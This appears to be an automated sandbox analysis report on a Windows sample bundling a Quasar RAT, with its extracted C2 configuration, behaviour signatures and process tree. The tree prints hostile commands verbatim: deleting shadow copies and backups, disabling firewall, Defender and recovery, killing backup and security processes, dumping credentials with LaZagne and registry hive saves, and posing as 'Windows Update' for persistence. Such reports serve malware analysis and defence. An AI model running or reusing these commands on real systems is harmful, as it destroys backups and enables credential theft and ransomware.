Resubmissions

01-10-2023 00:42

231001-a2v13agb7v 10

01-10-2023 00:39

231001-azmlxahf45 10

30-09-2023 17:31

230930-v3wdfafh25 10

Analysis

  • max time kernel
    149s
  • max time network
    160s
  • platform
    windows10-1703_x64
  • resource
    win10-20230915-en
  • resource tags

    arch:x64arch:x86image:win10-20230915-enlocale:en-usos:windows10-1703-x64system
  • submitted
    01-10-2023 00:39

General

  • Target

    vcac.exe

  • Size

    24.2MB

  • MD5

    bd60bf2d7f1f2f813f22005f645b54a6

  • SHA1

    f26fd66a37d21522bcc3bb95dd1a0af12d3978cc

  • SHA256

    b416ba3614cf4d62af4a1a558d2ca647ecf8196b251217e6d5809f5044bb4d9b

  • SHA512

    1522830159961b626f0b16bdc5daa1923f7a911b7a80718143fe8cf6737bd86f25425d23badb7137319ed80afedf0a70914dfd40a071bde1507ab4d9bb999cc9

  • SSDEEP

    98304:qKBbBWIgWljGxRB/LLqvc22SsaNYfdPBldt6+dBcjHVCU688cIyGOk3ta:P4xRBj4B7j4U6gl

Malware Config

Extracted

Family

quasar

Attributes
  • reconnect_delay

    1

Extracted

Family

quasar

Version

1.4.1

Botnet

user

C2

192.168.0.13:3440

elpepemanca.ddns.net:3440

Mutex

5950a87d-00d0-4fc0-a953-61143318e6d1

Attributes
  • encryption_key

    1A866C514D7B8C5F02AAA72B847C1F305295B74C

  • install_name

    Windows.exe

  • log_directory

    Logs

  • reconnect_delay

    1

  • startup_key

    Discord.exe

  • subdirectory

    System

Signatures

  • Quasar RAT

    Quasar is an open source Remote Access Tool.

  • Quasar payload 4 IoCs
  • Deletes shadow copies 2 TTPs

    Ransomware often targets backup files to inhibit system recovery.

  • Disables Task Manager via registry modification
  • Drops file in Drivers directory 1 IoCs
  • Modifies Windows Firewall 1 TTPs 5 IoCs
  • Possible privilege escalation attempt 2 IoCs
  • Drops startup file 2 IoCs
  • Executes dropped EXE 8 IoCs
  • Loads dropped DLL 40 IoCs
  • Modifies file permissions 1 TTPs 2 IoCs
  • Reads data files stored by FTP clients 2 TTPs

    Tries to access configuration files associated with programs like FileZilla.

  • Reads local data of messenger clients 2 TTPs

    Infostealers often target stored data of messaging applications, which can include saved credentials and account information.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses Microsoft Outlook profiles 1 TTPs 7 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Drops desktop.ini file(s) 1 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Writes to the Master Boot Record (MBR) 1 TTPs 2 IoCs

    Bootkits write to the MBR to gain persistence at a level below the operating system.

  • Drops file in System32 directory 1 IoCs
  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
  • Drops file in Windows directory 2 IoCs
  • Detects Pyinstaller 3 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Checks SCSI registry key(s) 3 TTPs 3 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 5 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Interacts with shadow copies 2 TTPs 1 IoCs

    Shadow copies are often targeted by ransomware to inhibit system recovery.

  • Kills process with taskkill 42 IoCs
  • Modifies data under HKEY_USERS 2 IoCs
  • Modifies registry class 1 IoCs
  • Modifies registry key 1 TTPs 2 IoCs
  • Opens file in notepad (likely ransom note) 3 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 64 IoCs
  • Suspicious use of SendNotifyMessage 64 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

  • outlook_office_path 1 IoCs
  • outlook_win_path 1 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\vcac.exe
    "C:\Users\Admin\AppData\Local\Temp\vcac.exe"
    1⤵
    • Drops file in Drivers directory
    • Drops startup file
    • Loads dropped DLL
    • Drops desktop.ini file(s)
    • Sets desktop wallpaper using registry
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of WriteProcessMemory
    PID:592
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Roaming\settings.bat
      2⤵
        PID:4656
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\System32\cmd.exe" /k cd %appdata% & lm.exe & exit
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:3456
        • C:\Users\Admin\AppData\Roaming\lm.exe
          lm.exe
          3⤵
          • Executes dropped EXE
          • Loads dropped DLL
          • Writes to the Master Boot Record (MBR)
          PID:3756
      • C:\Users\Admin\AppData\Roaming\mbr.exe
        "C:\Users\Admin\AppData\Roaming\mbr.exe"
        2⤵
        • Executes dropped EXE
        • Adds Run key to start application
        • Writes to the Master Boot Record (MBR)
        • Suspicious use of WriteProcessMemory
        PID:3784
        • C:\Windows\SysWOW64\schtasks.exe
          schtasks.exe /Create /TN "Windows Update" /ru SYSTEM /SC ONSTART /TR "C:\Users\Admin\AppData\Roaming\mbr.exe"
          3⤵
          • Creates scheduled task(s)
          PID:4500
      • C:\Users\Admin\AppData\Roaming\svchost.exe
        "C:\Users\Admin\AppData\Roaming\svchost.exe"
        2⤵
        • Executes dropped EXE
        • Drops file in System32 directory
        • Suspicious use of WriteProcessMemory
        PID:4272
        • C:\Windows\System32\cmd.exe
          "C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32 && icacls C:\Windows\System32 /grant "%username%:F"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:4552
          • C:\Windows\system32\takeown.exe
            takeown /f C:\Windows\System32
            4⤵
            • Possible privilege escalation attempt
            • Modifies file permissions
            • Suspicious use of AdjustPrivilegeToken
            PID:4600
          • C:\Windows\system32\icacls.exe
            icacls C:\Windows\System32 /grant "Admin:F"
            4⤵
            • Possible privilege escalation attempt
            • Modifies file permissions
            PID:4784
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\System32\cmd.exe" /c taskkill /F /IM BackupExecAgentBrowser* & taskkill /F /IM BackupExecDiveciMediaService* & taskkill /F /IM BackupExecJobEngine* & taskkill /F /IM BackupExecManagementService* & taskkill /F /IM vss* & taskkill /F /IM sql* & taskkill /F /IM svc$* & taskkill /F /IM memtas* & taskkill /F /IM sophos* & taskkill /F /IM veeam* & taskkill /F /IM backup* & taskkill /F /IM GxVss* & taskkill /F /IM GxBlr* & taskkill /F /IM GxFWD* & taskkill /F /IM GxCVD* & taskkill /F /IM GxCIMgr* & taskkill /F /IM DefWatch* & taskkill /F /IM ccEvtMgr* & taskkill /F /IM SavRoam* & taskkill /F /IM RTVscan* & taskkill /F /IM QBFCService* & taskkill /F /IM Intuit.QuickBooks.FCS* & taskkill /F /IM YooBackup* & taskkill /F /IM YooIT* & taskkill /F /IM zhudongfangyu* & taskkill /F /IM sophos* & taskkill /F /IM stc_raw_agent* & taskkill /F /IM VSNAPVSS* & taskkill /F /IM QBCFMonitorService* & taskkill /F /IM VeeamTransportSvc* & taskkill /F /IM VeeamDeploymentService* & taskkill /F /IM VeeamNFSSvc* & taskkill /F /IM veeam* & taskkill /F /IM PDVFSService* & taskkill /F /IM BackupExecVSSProvider* & taskkill /F /IM BackupExecAgentAccelerator* & taskkill /F /IM BackupExecRPCService* & taskkill /F /IM AcrSch2Svc* & taskkill /F /IM AcronisAgent* & taskkill /F /IM CASAD2DWebSvc* & taskkill /F /IM CAARCUpdateSvc* & taskkill /F /IM TeamViewer*
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:1816
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /F /IM BackupExecAgentBrowser*
          3⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:4068
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /F /IM BackupExecDiveciMediaService*
          3⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:4332
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /F /IM BackupExecJobEngine*
          3⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:5020
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /F /IM BackupExecManagementService*
          3⤵
          • Kills process with taskkill
          PID:1364
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /F /IM vss*
          3⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:1808
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /F /IM sql*
          3⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:908
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /F /IM svc$*
          3⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:2080
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /F /IM memtas*
          3⤵
          • Kills process with taskkill
          PID:3800
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /F /IM sophos*
          3⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:5008
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /F /IM veeam*
          3⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:2244
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /F /IM backup*
          3⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:4588
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /F /IM GxVss*
          3⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:4080
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /F /IM GxBlr*
          3⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:4672
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /F /IM GxFWD*
          3⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:4040
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /F /IM GxCVD*
          3⤵
          • Kills process with taskkill
          PID:600
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /F /IM GxCIMgr*
          3⤵
          • Kills process with taskkill
          PID:624
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /F /IM DefWatch*
          3⤵
          • Kills process with taskkill
          PID:1684
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /F /IM ccEvtMgr*
          3⤵
          • Kills process with taskkill
          PID:1944
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /F /IM SavRoam*
          3⤵
          • Kills process with taskkill
          PID:5048
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /F /IM RTVscan*
          3⤵
          • Kills process with taskkill
          PID:8
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /F /IM QBFCService*
          3⤵
          • Kills process with taskkill
          • Suspicious use of WriteProcessMemory
          PID:4520
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /F /IM Intuit.QuickBooks.FCS*
          3⤵
          • Kills process with taskkill
          PID:4868
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /F /IM YooBackup*
          3⤵
          • Kills process with taskkill
          PID:4004
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /F /IM YooIT*
          3⤵
          • Kills process with taskkill
          PID:4972
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /F /IM zhudongfangyu*
          3⤵
          • Kills process with taskkill
          PID:4268
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /F /IM sophos*
          3⤵
          • Kills process with taskkill
          PID:4944
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /F /IM stc_raw_agent*
          3⤵
          • Kills process with taskkill
          PID:3556
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /F /IM VSNAPVSS*
          3⤵
          • Kills process with taskkill
          PID:2848
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /F /IM QBCFMonitorService*
          3⤵
          • Kills process with taskkill
          PID:4108
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /F /IM VeeamTransportSvc*
          3⤵
          • Kills process with taskkill
          PID:212
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /F /IM VeeamDeploymentService*
          3⤵
          • Kills process with taskkill
          PID:712
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /F /IM VeeamNFSSvc*
          3⤵
          • Kills process with taskkill
          PID:4928
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /F /IM veeam*
          3⤵
          • Kills process with taskkill
          PID:2052
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /F /IM PDVFSService*
          3⤵
          • Kills process with taskkill
          PID:2340
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /F /IM BackupExecVSSProvider*
          3⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:3800
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /F /IM BackupExecAgentAccelerator*
          3⤵
          • Executes dropped EXE
          • Kills process with taskkill
          • Suspicious behavior: EnumeratesProcesses
          PID:1856
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /F /IM BackupExecRPCService*
          3⤵
          • Kills process with taskkill
          PID:840
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /F /IM AcrSch2Svc*
          3⤵
          • Kills process with taskkill
          PID:3092
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /F /IM AcronisAgent*
          3⤵
          • Kills process with taskkill
          PID:3988
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /F /IM CASAD2DWebSvc*
          3⤵
          • Kills process with taskkill
          PID:2304
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /F /IM CAARCUpdateSvc*
          3⤵
          • Kills process with taskkill
          PID:1840
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /F /IM TeamViewer*
          3⤵
          • Kills process with taskkill
          PID:4036
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\System32\cmd.exe" /c netsh advfirewall set allprofiles state off & netsh advfirewall set currentprofile state off & netsh advfirewall set domainprofile state off & netsh advfirewall set privateprofile state off & netsh advfirewall set publicprofile state off & REG ADD HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f & REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f & REG ADD HKCU\Software\Microsoft\Windows\System /v DisableCMD /t REG_DWORD /d 2 /f & powershell -Command Add-MpPreference -ExclusionExtension .exe
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:4436
        • C:\Windows\SysWOW64\netsh.exe
          netsh advfirewall set allprofiles state off
          3⤵
          • Modifies Windows Firewall
          PID:1796
        • C:\Windows\SysWOW64\netsh.exe
          netsh advfirewall set currentprofile state off
          3⤵
          • Modifies Windows Firewall
          PID:96
        • C:\Windows\SysWOW64\netsh.exe
          netsh advfirewall set domainprofile state off
          3⤵
          • Modifies Windows Firewall
          PID:3584
        • C:\Windows\SysWOW64\netsh.exe
          netsh advfirewall set privateprofile state off
          3⤵
          • Modifies Windows Firewall
          PID:840
        • C:\Windows\SysWOW64\netsh.exe
          netsh advfirewall set publicprofile state off
          3⤵
          • Modifies Windows Firewall
          PID:2584
        • C:\Windows\SysWOW64\reg.exe
          REG ADD HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f
          3⤵
            PID:4400
          • C:\Windows\SysWOW64\reg.exe
            REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
            3⤵
            • Modifies registry key
            PID:2144
          • C:\Windows\SysWOW64\reg.exe
            REG ADD HKCU\Software\Microsoft\Windows\System /v DisableCMD /t REG_DWORD /d 2 /f
            3⤵
            • Modifies registry key
            PID:3064
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            powershell -Command Add-MpPreference -ExclusionExtension .exe
            3⤵
            • Suspicious behavior: EnumeratesProcesses
            PID:4956
        • C:\Windows\SysWOW64\cmd.exe
          "C:\Windows\System32\cmd.exe" /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet
          2⤵
          • Suspicious use of WriteProcessMemory
          PID:4520
          • C:\Windows\SysWOW64\vssadmin.exe
            vssadmin delete shadows /all /quiet
            3⤵
            • Interacts with shadow copies
            PID:3128
          • C:\Windows\SysWOW64\Wbem\WMIC.exe
            wmic shadowcopy delete
            3⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:3816
        • C:\Users\Admin\AppData\Roaming\pass.exe
          "C:\Users\Admin\AppData\Roaming\pass.exe"
          2⤵
          • Executes dropped EXE
          • Suspicious behavior: EnumeratesProcesses
          PID:2680
          • C:\Windows\SysWOW64\cmd.exe
            "cmd" /c cd %appdata% & laZagne.exe all -oA -output %appdata% & ren credentials*.txt pass.txt
            3⤵
              PID:1968
              • C:\Users\Admin\AppData\Roaming\LaZagne.exe
                laZagne.exe all -oA -output C:\Users\Admin\AppData\Roaming
                4⤵
                • Executes dropped EXE
                PID:4904
                • C:\Users\Admin\AppData\Roaming\LaZagne.exe
                  laZagne.exe all -oA -output C:\Users\Admin\AppData\Roaming
                  5⤵
                  • Executes dropped EXE
                  • Loads dropped DLL
                  • Accesses Microsoft Outlook profiles
                  • outlook_office_path
                  • outlook_win_path
                  PID:2704
                  • C:\Windows\SYSTEM32\cmd.exe
                    cmd.exe /c "reg.exe save hklm\sam C:\Users\Admin\AppData\Local\Temp\qzziixfv"
                    6⤵
                    • Suspicious use of AdjustPrivilegeToken
                    PID:1364
                    • C:\Windows\system32\reg.exe
                      reg.exe save hklm\sam C:\Users\Admin\AppData\Local\Temp\qzziixfv
                      7⤵
                        PID:884
                    • C:\Windows\SYSTEM32\cmd.exe
                      cmd.exe /c "reg.exe save hklm\security C:\Users\Admin\AppData\Local\Temp\erkcpundyf"
                      6⤵
                        PID:4880
                      • C:\Windows\SYSTEM32\cmd.exe
                        cmd.exe /c "reg.exe save hklm\system C:\Users\Admin\AppData\Local\Temp\irkjzq"
                        6⤵
                          PID:216
                  • C:\Windows\SysWOW64\cmd.exe
                    "cmd" /c cd %appdata% & del /f credentials* & del /f pass.txt & del /f LaZagne.exe & del /f tool.bin
                    3⤵
                      PID:4592
                      • C:\Windows\System32\Conhost.exe
                        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        4⤵
                          PID:2144
                    • C:\Users\Admin\AppData\Roaming\server.exe
                      "C:\Users\Admin\AppData\Roaming\server.exe"
                      2⤵
                      • Executes dropped EXE
                      • Suspicious use of SetWindowsHookEx
                      PID:5016
                    • C:\Users\Admin\AppData\Roaming\discord.exe
                      "C:\Users\Admin\AppData\Roaming\discord.exe"
                      2⤵
                        PID:1856
                    • C:\Windows\system32\taskmgr.exe
                      "C:\Windows\system32\taskmgr.exe" /4
                      1⤵
                      • Drops file in Windows directory
                      • Checks SCSI registry key(s)
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious behavior: GetForegroundWindowSpam
                      • Suspicious use of AdjustPrivilegeToken
                      • Suspicious use of FindShellTrayWindow
                      • Suspicious use of SendNotifyMessage
                      PID:1920
                    • C:\Windows\system32\vssvc.exe
                      C:\Windows\system32\vssvc.exe
                      1⤵
                      • Suspicious use of AdjustPrivilegeToken
                      PID:3024
                    • C:\Windows\system32\reg.exe
                      reg.exe save hklm\security C:\Users\Admin\AppData\Local\Temp\erkcpundyf
                      1⤵
                        PID:600
                      • C:\Windows\system32\reg.exe
                        reg.exe save hklm\system C:\Users\Admin\AppData\Local\Temp\irkjzq
                        1⤵
                          PID:4876
                        • C:\Windows\system32\NOTEPAD.EXE
                          "C:\Windows\system32\NOTEPAD.EXE" C:\vcredist2012_x86_0_vcRuntimeMinimum_x86.log
                          1⤵
                          • Opens file in notepad (likely ransom note)
                          PID:3568
                        • C:\Windows\system32\NOTEPAD.EXE
                          "C:\Windows\system32\NOTEPAD.EXE" C:\vcredist2012_x86_0_vcRuntimeMinimum_x86.log
                          1⤵
                          • Opens file in notepad (likely ransom note)
                          PID:828
                        • C:\Windows\system32\NOTEPAD.EXE
                          "C:\Windows\system32\NOTEPAD.EXE" C:\vcredist2012_x64_0_vcRuntimeMinimum_x64.log
                          1⤵
                          • Opens file in notepad (likely ransom note)
                          PID:4904
                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                          "C:\Program Files\Google\Chrome\Application\chrome.exe"
                          1⤵
                          • Enumerates system info in registry
                          • Modifies data under HKEY_USERS
                          • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
                          PID:3260
                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xcc,0xd0,0xd4,0x84,0xd8,0x7ff9676c9758,0x7ff9676c9768,0x7ff9676c9778
                            2⤵
                              PID:164
                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1804 --field-trial-handle=1840,i,11650929024970503297,4392597635526924502,131072 /prefetch:8
                              2⤵
                                PID:2712
                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2844 --field-trial-handle=1840,i,11650929024970503297,4392597635526924502,131072 /prefetch:1
                                2⤵
                                  PID:4360
                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2836 --field-trial-handle=1840,i,11650929024970503297,4392597635526924502,131072 /prefetch:1
                                  2⤵
                                    PID:1796
                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2080 --field-trial-handle=1840,i,11650929024970503297,4392597635526924502,131072 /prefetch:8
                                    2⤵
                                      PID:2588
                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1532 --field-trial-handle=1840,i,11650929024970503297,4392597635526924502,131072 /prefetch:2
                                      2⤵
                                        PID:4672
                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4380 --field-trial-handle=1840,i,11650929024970503297,4392597635526924502,131072 /prefetch:1
                                        2⤵
                                          PID:3256
                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4564 --field-trial-handle=1840,i,11650929024970503297,4392597635526924502,131072 /prefetch:8
                                          2⤵
                                            PID:4916
                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4724 --field-trial-handle=1840,i,11650929024970503297,4392597635526924502,131072 /prefetch:8
                                            2⤵
                                              PID:4644
                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5020 --field-trial-handle=1840,i,11650929024970503297,4392597635526924502,131072 /prefetch:8
                                              2⤵
                                                PID:3904
                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4584 --field-trial-handle=1840,i,11650929024970503297,4392597635526924502,131072 /prefetch:8
                                                2⤵
                                                  PID:4132
                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5296 --field-trial-handle=1840,i,11650929024970503297,4392597635526924502,131072 /prefetch:8
                                                  2⤵
                                                    PID:3548
                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5360 --field-trial-handle=1840,i,11650929024970503297,4392597635526924502,131072 /prefetch:8
                                                    2⤵
                                                      PID:4128
                                                  • C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe
                                                    "C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"
                                                    1⤵
                                                      PID:600
                                                    • C:\Program Files\Mozilla Firefox\firefox.exe
                                                      "C:\Program Files\Mozilla Firefox\firefox.exe"
                                                      1⤵
                                                        PID:1820
                                                        • C:\Program Files\Mozilla Firefox\firefox.exe
                                                          "C:\Program Files\Mozilla Firefox\firefox.exe"
                                                          2⤵
                                                          • Checks processor information in registry
                                                          • Modifies registry class
                                                          • Suspicious use of SetWindowsHookEx
                                                          PID:2244
                                                          • C:\Program Files\Mozilla Firefox\firefox.exe
                                                            "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2244.0.126992754\1345456090" -parentBuildID 20221007134813 -prefsHandle 1712 -prefMapHandle 1688 -prefsLen 20936 -prefMapSize 232675 -appDir "C:\Program Files\Mozilla Firefox\browser" - {b1749b90-4641-4be2-8938-9639c1a3f5c2} 2244 "\\.\pipe\gecko-crash-server-pipe.2244" 1792 256c9bd9a58 gpu
                                                            3⤵
                                                              PID:3732
                                                            • C:\Program Files\Mozilla Firefox\firefox.exe
                                                              "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2244.1.1541991436\1506761253" -parentBuildID 20221007134813 -prefsHandle 2136 -prefMapHandle 2132 -prefsLen 21017 -prefMapSize 232675 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {2ceafee2-8a37-4223-90dc-cbd7aaee7ad6} 2244 "\\.\pipe\gecko-crash-server-pipe.2244" 2148 256c9332658 socket
                                                              3⤵
                                                                PID:960
                                                              • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2244.2.1459241840\1269587518" -childID 1 -isForBrowser -prefsHandle 3088 -prefMapHandle 3084 -prefsLen 21120 -prefMapSize 232675 -jsInitHandle 1036 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {60353fa3-bc2d-4e41-bb5d-a448413cadd4} 2244 "\\.\pipe\gecko-crash-server-pipe.2244" 2780 256cd3f8e58 tab
                                                                3⤵
                                                                  PID:2352
                                                                • C:\Program Files\Mozilla Firefox\firefox.exe
